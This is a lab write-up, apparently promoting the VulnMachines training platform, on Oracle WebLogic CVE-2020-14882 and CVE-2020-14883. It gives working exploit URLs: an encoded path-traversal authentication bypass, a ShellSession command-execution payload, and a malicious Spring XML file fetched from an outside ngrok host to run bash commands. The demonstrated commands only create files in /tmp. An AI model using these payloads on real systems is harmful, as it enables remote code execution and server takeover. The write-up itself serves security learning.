Oracle Weblogic Server Vulnerability : CVE-2020–14882

What is VulnMachines?

Hi Pentesters, This is Punit Darji. I have created a platform called VulnMachines. This platform is for people who are willing to learn about cyber security and pentesting with real life scenario. Therefore, I have decided to deliver real life based scenario labs with Basic to Advance level labs, CVE labs and many other practical that will help you to improve your knowledge. You can join on this platform as individual and as a team.

Oracle Weblogic vulnerability

CVE-2020–14882 Oracle Weblogic Server

This vulnerability allows an attacker to bypass the authentication in administrator console component and access the portal.

http://your-ip:port/console/css/%252e%252e%252fconsole.portal

Rapidsafeguard

CVE-2020–14883 Oracle Weblogic Server vulnerability

There are two ways to exploit.

com.tangosol.coherence.mvel2.sh.ShellSession
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

Let’s take first method using shellsession.

http://ip:port/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/exploit1');")

Applied this payload using burp suit to upload file exploit1.

Vulnmachines

Before request.

exploit1 file has been successfully executed inside the container:

After successfully execute the request.

Note: This method of exploit can only be used in Weblogic 12.2.1 and above, because 10.3.6 doesn’t have the class.

Second method using FileSystemXmlApplicationContext.

In this method, crafted XML file and serve it on a server that Weblogic can access such as localhost, python server or any other server. In this attack I have used ngrok.

Inside poc.xml

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/exploit2]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

Capture the request using burp suit and send request using ngrok.

http://ip:port/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://ngrok.service/poc.xml")

Rapidsafeguard

After executing the request.

Note: exploit is that, it requires the Weblogic server to be able to access the malicious XML.

Video PoC

Hire me!!

Punit Darji - Bengaluru, Karnataka, India | Professional Profile | LinkedIn

Twitter : https://twitter.com/rapidsafeguard

YouTube : https://www.youtube.com/c/RapidSafeGuard/playlists